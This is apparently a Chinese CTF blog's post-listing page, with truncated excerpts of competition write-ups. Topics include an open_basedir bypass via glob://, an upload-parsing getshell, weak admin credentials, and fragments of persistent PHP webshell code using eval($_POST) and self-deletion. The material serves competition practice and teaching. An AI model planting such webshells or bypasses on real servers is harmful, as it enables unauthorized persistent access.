php绕过open_basedir open_basedir一般用来限制跨目录读写文件 php绕过open_basedir是一个古老的漏洞,在2009年左右就被提出来了 glob://opendir()函数为打开目录句柄,readdir()函数为从目录句柄中读取条目。 这里结合两个函数来列举根目录中的文件: 1234567$a="glob:///*";if ( $b = opendir($a) 2022-03-25 php #总结 #php #open_basedir #bypass
HSC1th 2022-wp miscSign-inflag{HSC_W3LC0M3} DORAEMON 哆啦A梦把泡好的QR放进口袋后,用六位数字把自己放好了。你能找到它吗? 压缩包先暴力破解出密码为376852 得到一张图片,发现高度不对劲,增加一点高度,看到破损的二维码把定位符补上,扫码得到flag 汝闻,人言否看到压缩包的50 4B 01 02,但是没找到头,搜了一下发现头被改成了4B 50结尾 2022-02-20 wp #wp #2022 #HSC
pwnthebox-内网渗透(入门) 使用到的工具kaliburpfirefoxreGeorgproxychainsnmap冰蝎蚁剑 题目描述根据描述得知有两层,因为是demo题目,所以给出了漏洞,降低了难度,实际上的题目漏洞点是不知道的,需要自己发掘 解题第一层apache解析漏洞上传1.php.jpg即可getshell 有了第一台主机的shell后首先要做的就是信息收集了 信息收集首先看ip,网段等信息。。。上来啥命令用不了 2022-01-14 内网 #内网渗透 #CVE
AWD不死马与克制方法 不死马一个典型的不死马: 12345678910111213<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.l.php'; $code = '<?php if(md5($_GET["pass"])== 2022-01-03 awd #awd #不死马
2021台州市首届网络安全大赛 喜提榜一 Webweb1flag在请求头中 web2扫描目录得到后台路径/admin 用admin,admin888弱口令进入后台 在网站安全一栏中使用检测木马功能,发现后门 使用文件管理功能查看木马文件,发现被混淆了 1234567891011<?php$mt = "mFsKCleRfU";$ojj = "IEBleldle";$hsa = &q 2021-12-17 wp #wp #2021 #台州
2021NUAA-wp 时间有点紧,有几题差一点 签到腾讯会议flag{we1c0m_t0_asur!ctf} miscbaby_mix伪加密,09改成00图片上边左边看到白条,应该是lsbstegsolve查看得到二维码扫码得到 14a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f57525 2021-12-11 wp #wp #nuaa #2021
【ctfshow】web入门-权限维持 WEB670-WEB676这几题做法都一样发现/var/www/html目录可写,既然是权限维持,那么直接传不死马 12345678910<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content = '<?php @eval($_POST["shell& 2021-12-09 ctfshow-web入门 #wp #ctfshow #web入门
首届安徽省“追日杯”大学生网络安全挑战赛-wp 混了个三等奖,奖状至今未发(主办方跑路了。。。) MISCcheckinflag{welcome_to_zrb@2021} 阵法的奥秘提示是8进制,观察到最后的数字是变化的 123456789PING zrb.edisec.net: 56 data bytes64 bytes from zrb.edisec.net: icmp_seq=3 ttl=51 time=97.77 ms64 bytes 2021-12-05 wp #2021 #wp - 追日杯 - 安徽
【ctfshow】击剑杯-wp 热身进群得码群里发送 击剑杯签到即可 听歌识曲赛后问了群友,可能真的是积累与特征吧大概有两种方法:1:听歌词百度2:直接知道什么歌答案是普京ctfshow{Vladimir_Vladimirovich_Putin} 看图识码网页是一张大的二维码,但是有四个定位符就很奇怪,根据hint,分离出四个小二维码用二维码神器cortexscan逐一扫描,然后拼接在一起,就是flag啦 看 2021-11-11 wp #wp #ctfshow